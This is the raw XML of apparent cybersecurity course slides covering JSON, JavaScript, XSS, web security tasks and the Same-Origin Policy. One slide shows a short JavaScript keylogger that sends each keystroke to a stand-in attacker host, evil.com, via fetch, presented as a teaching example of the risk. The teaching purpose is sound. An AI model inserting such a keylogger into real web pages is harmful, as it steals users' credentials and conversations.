            <a:ext cx="1658484" cy="20855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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="9065059">
            <a:off x="2229462" y="3298959"/>
            <a:ext cx="1658456" cy="20855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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="1736330">
            <a:off x="5219758" y="3046932"/>
            <a:ext cx="1658484" cy="20855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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="-9065059">
            <a:off x="5250532" y="3247431"/>
            <a:ext cx="1658456" cy="20855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8" name="Google Shape;1378;p85"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6203608" y="2662052"/>
            <a:ext cx="389602" cy="533700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1379" name="Google Shape;1379;p85"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2670008" y="2604477"/>
            <a:ext cx="389602" cy="533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Object Notation (JSON)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1385" name="Google Shape;1385;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highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>JSON is one of the most popular ways for clients and servers to format request/response data</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1386" name="Google Shape;1386;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87" name="Google Shape;1387;p86"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="395676" y="1423699"/>
            <a:ext cx="4748476" cy="3279025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1388" name="Google Shape;1388;p86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5690050" y="2160363"/>
            <a:ext cx="2991900" cy="18057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JSON syntax is identical to the syntax used to create objects in JavaScript (which are equivalent to dictionaries in Python).</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87"/>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This code sends every key the user presses to an attacker’s server at http://evil.com, using an HTTP GET request and JavaScript’s ability to respond to user events (in this case, a key press).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Then, attackers will be able to see every key you press while you’re on the web page—allowing them to steal usernames, passwords, and conversations.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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94" name="Google Shape;1394;p8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 Cup of JavaScript</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1395" name="Google Shape;1395;p8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6" name="Google Shape;1396;p87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368700" y="1183050"/>
            <a:ext cx="5709600" cy="3622200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:srgbClr val="F1C232"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="365750" spcFirstLastPara="1" rIns="36575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A5A5A5"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>// keylogger!</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="A5A5A5"/>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00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>addEventListener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>‘keyup’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="E7E6E6"/>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E7E6E6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="E7E6E6"/>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E7E6E6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>event</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>target</a:t>
            </a:r>
            <a:endParaRPr sz="1800">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E7E6E6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> =</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="E7E6E6"/>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E7E6E6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>    `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>http://evil.com?d=${value}`</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="70AD47"/>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E7E6E6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>fetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>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00"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>    url: url,</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>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00"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>  	method: GET</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>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00"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>	}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="E7E6E6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="E7E6E6"/>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E7E6E6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>  })</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="E7E6E6"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="D9D9D9"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1397" name="Google Shape;1397;p87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="7056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JavaScript's ability to send/receive data over the network is powerful, but is also a security liability.</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3" name="Google Shape;1403;p8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Inspecting HTML</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="F1C23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Web and Security Concerns </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1409" name="Google Shape;1409;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Security Task examples that require knowledge of HTML documentation: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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1410" name="Google Shape;1410;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1" name="Google Shape;1411;p8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Interpreting captures of web traffic, as collected by Wireshark; Snort, and other incident detection systems; firewalls; and others</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1412" name="Google Shape;1412;p8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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Understanding the concept of cross-site scripting vulnerabilities (XSS) attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1413" name="Google Shape;1413;p8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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Identifying cross-site scripting in hands-on web penetration testing scenarios</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1414" name="Google Shape;1414;p8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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Understanding browser-based social engineering attacks, such as clickjacking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9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420" name="Google Shape;1420;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1" name="Google Shape;1421;p9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Student </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Activity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Inspecting Web Assets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inspect HTML, CSS and JavaScript to better understand how they’re used and how they can be abused.</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Instructions sent via Slack. </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7" name="Google Shape;1427;p91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2607800" y="3425000"/>
            <a:ext cx="39537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Inspecting Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Assets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56"/>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web is most organization’s largest attack surface. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1053" name="Google Shape;1053;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9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Same-Origin and CORS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1433" name="Google Shape;1433;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Google Shape;1438;p9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Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Same-Origin Policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Cross-Origin Resource Sharing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> the issue of JavaScript and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>similar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> files from being used toward malicious effect.</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1439" name="Google Shape;1439;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Same-Origin Policy. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1445" name="Google Shape;1445;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="9144000" cy="6786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a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Browsers have security policies in place to prevent this kind of abusive resource sharing. The most important is called the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Same-Origin Policy (SOP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1446" name="Google Shape;1446;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7" name="Google Shape;1447;p9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Two URLs have the same origin if the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>protocol, port and host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> are the same. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="45720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If you read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, your browser can only request additional assets that live at</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
